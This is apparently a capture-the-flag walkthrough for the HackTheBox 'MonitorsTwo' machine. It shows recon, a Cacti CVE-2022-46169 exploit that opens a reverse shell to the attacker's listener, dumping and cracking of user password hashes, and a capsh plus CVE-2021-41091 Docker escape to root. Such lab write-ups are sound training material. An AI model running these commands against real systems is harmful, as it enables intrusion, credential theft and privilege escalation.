MonitorsTwo

#Linux #Enumeration #Docker

This is a easy difficulty Linux machine from HackTheBox created by TheCyberGeek. In this scenario, my IP is 10.10.14.32 and the target’s IP is 10.129.198.242

This machine was pretty funny; it is straightforward if you ignore the amount of noise if you fuzz the target. It has a proper amount of research once you interact with the target. Furthermore, when you are inside, the machine is designed to be an introduction to escape from Docker Containers. The only weird thing is the privilege scalation because the source of the information was well hidden.

Recon

The first steps are about getting basic information about the target, by using nmap and searching information from the website.

Local Terminal

ping -c 1 10.129.198.242

Pinging 10.129.198.242 with 32 bytes of data:
Reply from 10.129.198.242: bytes=32 time=169ms TTL=63
Reply from 10.129.198.242: bytes=32 time=156ms TTL=63
Reply from 10.129.198.242: bytes=32 time=165ms TTL=63
Reply from 10.129.198.242: bytes=32 time=189ms TTL=63

Ping statistics for 10.129.198.242:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 156ms, Maximum = 189ms, Average = 169ms

The machine is alive, and by the TTL (close to 64) we can assume and confirm that is definitely a Linux Machine

Local Terminal

nmap -p- --open -sS --min-rate 5000 -vvv -n 10.129.198.242 -oG Ports

Completed SYN Stealth Scan at 10:09, 16.37s elapsed (65535 total ports)
Nmap scan report for 10.129.198.242
Host is up, received echo-reply ttl 63 (0.18s latency).
Scanned at 2023-05-25 10:09:29 Pacific SA Standard Time for 17s
Not shown: 65391 closed tcp ports (reset), 142 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

Local Terminal

nmap -sCV -p 22,80 10.129.198.242 -oN Target

Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-25 10:10 Pacific SA Standard Time
Nmap scan report for 10.129.198.242
Host is up (0.18s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Login to Cacti
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

By searching "OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 launchpad" in google, we find that our target is a Linux-Focal machine, is good to know every detail about the target... and the other information to the pocket, is that the port 80 use nginx/1.18.0.

Local Terminal

whatweb http://10.129.198.242/

http://10.129.198.242/ [200 OK] Cacti, Cookies[Cacti], Country[RESERVED][ZZ], 
HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], HttpOnly[Cacti], IP[10.129.198.242], 
JQuery, PHP[7.4.33], PasswordField[login_password], Script[text/javascript], 
Title[Login to Cacti], UncommonHeaders[content-security-policy], 
X-Frame-Options[SAMEORIGIN], X-Powered-By[PHP/7.4.33], X-UA-Compatible[IE=Edge], nginx[1.18.0]

• Browser: http://10.129.198.242/

[+] Data : Cacti version 1.2.22

At the view:source there is a lot of information at the login page, another detail, the site redirect us to a index.php, we can use FUZZ with php too.

Local Terminal

wfuzz -c -f FuzzFile -t 200 --hc=404 -w /shared/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.129.198.242/FUZZ

********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.129.198.242/FUZZ
Total requests: 220546

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000002:   301        9 L      28 W       314 Ch      "images"
000000076:   301        9 L      28 W       312 Ch      "docs"
000000505:   301        9 L      28 W       315 Ch      "plugins"
000000361:   301        9 L      28 W       315 Ch      "service"
000000625:   403        9 L      28 W       276 Ch      "log"
000000707:   301        9 L      28 W       311 Ch      "lib"
000000701:   301        9 L      28 W       315 Ch      "install"
000000260:   301        9 L      28 W       315 Ch      "scripts"
000000865:   301        9 L      28 W       316 Ch      "resource"
000001098:   301        9 L      28 W       315 Ch      "include"
000001069:   301        9 L      28 W       313 Ch      "cache"
000003281:   200        279 L    2491 W     15171 Ch    "LICENSE"
000005002:   301        9 L      28 W       315 Ch      "formats"
000007829:   200        3624 L   36423 W    254887 Ch   "CHANGELOG"
000020615:   301        9 L      28 W       315 Ch      "locales"
000020670:   403        9 L      28 W       276 Ch      "cli"
000045314:   301        9 L      28 W       312 Ch      "mibs"

I went to LICENSE and CHANGELOG, there is nothing interesting there, the other sites are errors or they redirect you to index.php.

Local Terminal

wfuzz -c -f FuzzFile -t 200 --hc=404 -w /shared/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.129.198.242/FUZZ.php

********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.129.198.242/FUZZ.php
Total requests: 220546

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000250:   302        0 L      0 W        0 Ch        "link"
000000001:   200        272 L    862 W      13844 Ch    "index"
000000047:   200        272 L    862 W      13843 Ch    "help"
000000033:   200        272 L    862 W      13844 Ch    "links"
000000520:   200        272 L    862 W      13844 Ch    "sites"
000000505:   200        272 L    862 W      13846 Ch    "plugins"
000000743:   200        272 L    862 W      13848 Ch    "utilities"
000000012:   200        272 L    862 W      13844 Ch    "about"
000001211:   302        0 L      0 W        0 Ch        "logout"
000001791:   200        272 L    862 W      13847 Ch    "settings"
000002727:   200        272 L    862 W      13828 Ch    "graph"
000002730:   200        272 L    862 W      13843 Ch    "host"
000002744:   200        272 L    862 W      13844 Ch    "color"
000002975:   200        272 L    862 W      13845 Ch    "graphs"
000003583:   200        272 L    862 W      13843 Ch    "tree"
000005326:   200        1 L      13 W       93 Ch       "cmd"
000012379:   200        272 L    862 W      13847 Ch    "managers"
000065905:   200        272 L    862 W      13843 Ch    "clog"
000082245:   200        0 L      12 W       58 Ch       "graph_image"

Exploit

Reverse Shell [www-data]

After some recon at some of the found websites, an option was to search for exploit for each framework version, and if you search for "Cacti 1.2.22 exploit" there is something, CVE-2022-46169, RCE.

GitHub - FredBrave/CVE-2022-46169-CACTI-1.2.22: This is a exploit of CVE-2022-46169 to cacti 1.2.22. This exploit allows through an RCE to obtain a reverse shell on your computer.GitHub

Download the python script, looks like an script to make a connection to a listening port, so here you need two local terminals.

Local Terminal A

nc -nlvp 443

Local Terminal B

python3 exploit.py -u http://10.129.198.242 --LHOST=10.10.14.32 --LPORT=443

Leave Docker Container

And we are in, our Local Terminal A is now [www-data]

Target Terminal [www-data]

www-data@50bca5e748b0:/var/www/html$ whoami
whoami

Now to work properly we need to upgrade the bash.

Target Terminal [www-data]

$ hostname -I
172.19.0.3

$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Uh... the machine is called "MonitorsTwo", it's no surprise that involve a Docker.

Target Terminal [www-data]

$ ls
CHANGELOG                   cli                        graph_templates.php         managers.php            rrdcleaner.php
LICENSE                     clog.php                   graph_templates_inputs.php  mibs                    script_server.php
README.md                   clog_user.php              graph_templates_items.php   permission_denied.php   scripts
about.php                   cmd.php                    graph_view.php              plugins                 service
aggregate_graphs.php        cmd_realtime.php           graph_xport.php             plugins.php             service_check.php
aggregate_items.php         color.php                  graphs.php                  poller.php              settings.php
aggregate_templates.php     color_templates.php        graphs_items.php            poller_automation.php   sites.php
auth_changepassword.php     color_templates_items.php  graphs_new.php              poller_boost.php        snmpagent_mibcache.php
auth_login.php              data_debug.php             help.php                    poller_commands.php     snmpagent_mibcachechild.php
auth_profile.php            data_input.php             host.php                    poller_dsstats.php      snmpagent_persist.php
automation_devices.php      data_queries.php           host_templates.php          poller_maintenance.php  spikekill.php
automation_graph_rules.php  data_source_profiles.php   images                      poller_realtime.php     templates_export.php
automation_networks.php     data_sources.php           include                     poller_recovery.php     templates_import.php
automation_snmp.php         data_templates.php         index.php                   poller_reports.php      tree.php
automation_templates.php    docs                       install                     poller_spikekill.php    user_admin.php
automation_tree_rules.php   formats                    lib                         pollers.php             user_domains.php
boost_rrdupdate.php         gprint_presets.php         link.php                    remote_agent.php        user_group_admin.php
cache                       graph.php                  links.php                   reports_admin.php       utilities.php
cacti.sql                   graph_image.php            locales                     reports_user.php        vdef.php
cactid.php                  graph_json.php             log                         resource
cdef.php                    graph_realtime.php         logout.php                  rra

Wow, there is a lot of stuff,

Target Terminal [www-data]

grep -E 'password' *.php
grep -E 'password' *.sql

By using this, I only find configuration and code, nothing about plain text credentials, but when I went to /, there is a file called entrypoint.sh... with sql credentials in plain text.

Database exploration

Target Terminal [www-data]

$ cat entrypoint.sh
#!/bin/bash
set -ex

wait-for-it db:3306 -t 300 -- echo "database is connected"
if [[ ! $(mysql --host=db --user=root --password=root cacti -e "show tables") =~ "automation_devices" ]]; then
    mysql --host=db --user=root --password=root cacti < /var/www/html/cacti.sql
    mysql --host=db --user=root --password=root cacti -e "UPDATE user_auth SET must_change_password='' WHERE username = 'admin'"
    mysql --host=db --user=root --password=root cacti -e "SET GLOBAL time_zone = 'UTC'"
fi

chown www-data:www-data -R /var/www/html
# first arg is `-f` or `--some-option`
if [ "${1#-}" != "$1" ]; then
        set -- apache2-foreground "$@"
fi

exec "$@"

Target Terminal [www-data]

$ mysql --host=db --user=root --password=root cacti

> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| cacti              |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
5 rows in set (0.001 sec)

> USE cacti
Database changed

> SHOW TABLES;
<...>
| snmpagent_managers_notifications    |
| snmpagent_mibs                      |
| snmpagent_notifications_log         |
| user_auth                           | #Here!
| user_auth_cache                     |
| user_auth_group                     |
| user_auth_group_members             |
| user_auth_group_perms               |
<...>

> select column_name from information_schema.columns WHERE table_name='user_auth';
+------------------------+
| column_name            |
+------------------------+
| id                     |
| username               | # This
| password               | # And this one.
| realm                  |
| full_name              |
| email_address          |
| must_change_password   |
| password_change        |
| show_tree              |
| show_list              |
| show_preview           |
| graph_settings         |
| login_opts             |
| policy_graphs          |
| policy_trees           |
| policy_hosts           |
| policy_graph_templates |
| enabled                |
| lastchange             |
| lastlogin              |
| password_history       |
| locked                 |
| failed_attempts        |
| lastfail               |
| reset_perms            |
+------------------------+

> select username,password from user_auth;
+----------+--------------------------------------------------------------+
| username | password                                                     |
+----------+--------------------------------------------------------------+
| admin    | $2y$10$IhEA.Og8vrvwueM7VEDkUes3pwc3zaBbQ/iuqMft/llx8utpR1hjC |
| guest    | 43e9a4ab75570f5b                                             |
| marcus   | $2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C |
+----------+--------------------------------------------------------------+

Reverse Shell [marcus]

And we find two credentials, I went to CrackStation, in HackTheBox is common to use frequent hashes, but this is not the case, so it's time to use John the Ripper.

Local Terminal

$ vi data
$2y$10$IhEA.Og8vrvwueM7VEDkUes3pwc3zaBbQ/iuqMft/llx8utpR1hjC
$2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C

$ john --wordlist=/usr/share/wordlists/rockyou.txt data

Loaded 2 password hashes with 2 different salts (bcrypt [Blowfish 32/64 X2])
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
funkymonkey      (?) # Maybe this is the only one we need

Target Terminal [marcus]

$ ssh marcus@10.129.198.242      # funkymonkey

$ cat /home/marcus/user.txt
724762f300026805b332d6fe9a6f2320

Privilege Escalation

Now we are inside the machine

Target Terminal [marcus]

marcus@monitorstwo:/$ id
uid=1000(marcus) gid=1000(marcus) groups=1000(marcus)

marcus@monitorstwo:/$ sudo -l
[sudo] password for marcus:
Sorry, user marcus may not run sudo on localhost.

marcus@monitorstwo:/$ find \-perm -4000 2>/dev/null
./usr/lib/dbus-1.0/dbus-daemon-launch-helper
./usr/lib/eject/dmcrypt-get-device
./usr/lib/policykit-1/polkit-agent-helper-1
./usr/lib/openssh/ssh-keysign
./usr/bin/mount
./usr/bin/sudo
./usr/bin/gpasswd
./usr/bin/umount
./usr/bin/passwd
./usr/bin/fusermount
./usr/bin/chsh
./usr/bin/at
./usr/bin/chfn
./usr/bin/newgrp
./usr/bin/su

marcus@monitorstwo:/$ find \-name config 2>/dev/null
<...>

Nothing suspicious, we can check some process then.

Target Terminal [marcus]

$ ps -aux
<...>

$ cat /etc/crontab
<...>

And now the grep cycle at /

Target Terminal [marcus]

$ grep -rni "marcus" --exclude-dir={proc,lib,sys} *
<...>

$ grep -rni "password" --exclude-dir={proc,lib,sys} *
<...>

$ grep -rni "CVE" --exclude-dir={proc,lib,sys} *
var/mail/marcus:9:CVE-2021-33033: This vulnerability affects the Linux kernel before 5.11.14 and is related to the CIPSO and CALIPSO refcounting for the DOI definitions. Attackers can exploit this use-after-free issue to write arbitrary values. Please update your kernel to version 5.11.14 or later to address this vulnerability.
var/mail/marcus:11:CVE-2020-25706: This cross-site scripting (XSS) vulnerability affects Cacti 1.2.13 and occurs due to improper escaping of error messages during template import previews in the xml_path field. This could allow an attacker to inject malicious code into the webpage, potentially resulting in the theft of sensitive data or session hijacking. Please upgrade to Cacti version 1.2.14 or later to address this vulnerability.
var/mail/marcus:13:CVE-2021-41091: This vulnerability affects Moby, an open-source project created by Docker for software containerization. Attackers could exploit this vulnerability by traversing directory contents and executing programs on the data directory with insufficiently restricted permissions. The bug has been fixed in Moby (Docker Engine) version 20.10.9, and users should update to this version as soon as possible. Please note that running containers should be stopped and restarted for the permissions to be fixed.

At /var/mail/marcus there is something relevant, the first two vulnerabilities are not interesting, but the third one it is.

GitHub - UncleJ4ck/CVE-2021-41091: POC for CVE-2021-41091GitHub

After reading a little bit, first we need to be root at the Docker Container.

Target Terminal [marcus]

marcus@monitorstwo:/$ vi /tmp/exploit.sh
#Paste the code of exp.sh

marcus@monitorstwo:/$ cd /tmp
marcus@monitorstwo:/tmp$ chmod 777 exploit.sh

Target Terminal [marcus]

marcus@monitorstwo:/tmp$ ./exploit.sh
[!] Vulnerable to CVE-2021-41091
[!] Now connect to your Docker container that is accessible and obtain root access !
[>] After gaining root access execute this command (chmod u+s /bin/bash)

Did you correctly set the setuid bit on /bin/bash in the Docker container? (yes/no): yes
[!] Available Overlay2 Filesystems:
/var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged
/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged

[!] Iterating over the available Overlay2 filesystems !
[?] Checking path: /var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged
[x] Could not get root access in '/var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged'

# This one is vulnerable!!
[?] Checking path: /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged
[!] Rooted !
[>] Current Vulnerable Path: /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged
[?] If it didn't spawn a shell go to this path and execute './bin/bash -p'

[!] Spawning Shell

It did not work, but at least we find the vulnerable docker. So, by coincidence it's the first docker that we attacked.

Exploiting CVE-2021-41091

Target Terminal [www-data]

$ find \-perm -4000 2>/dev/null
./usr/bin/gpasswd
./usr/bin/passwd
./usr/bin/chsh
./usr/bin/chfn
./usr/bin/newgrp
./sbin/capsh #Perfect!
./bin/mount
./bin/umount
./bin/su

# From GTFOBins
$ www-data@50bca5e748b0:/$ ./sbin/capsh --gid=0 --uid=0 --
root@50bca5e748b0:/#

root@50bca5e748b0:/# chmod u+s /bin/bash

capsh | GTFOBins

Now that the docker's bash is usable to everyone, we return to the other terminal with the user marcus, and then execute that bash.

Target Terminal [marcus]

/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged/bin/bash -p

Target Terminal [root]

bash-5.1# cat /root/root.txt
45198600518fa3f5b9c46d62a2ef4773